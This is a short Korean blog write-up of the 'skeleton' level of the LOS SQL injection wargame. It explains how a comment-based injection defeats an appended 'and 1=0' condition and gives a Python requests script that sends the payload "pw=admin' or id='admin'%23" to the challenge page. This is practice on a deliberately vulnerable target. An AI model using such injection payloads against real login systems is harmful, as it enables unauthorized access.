WarGame/LOS
10. LOS - skeleton
m0nd2y
2018. 8. 7. 07:17
LOS 10번째 문제 skeleton입니다!
먼저 코드를 보면
pw뒤에 and 1 = 0으로 만들어줘서 고의적으로 거짓으로 만들어 줬습니다.
그럼 저 부분을 참으로 만들어줘야하는데
저는 id에 'admin'을 넣고 뒷부분을 모두 주석으로 처리해주어서 풀었습니다 :)
페이로드는 다음과 같습니다.
1 2 3 4 5 6 7 8 9 10 11 | import requests import string URL = "http://los.eagle-jump.org/skeleton_8d9cbfe1efbd44cfbbdc63fa605e5f1b.php" payload = "?pw=admin' or id='admin'%23" URL += payload cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11") response = requests.get(URL, cookies = cookies) print(response.text) | cs |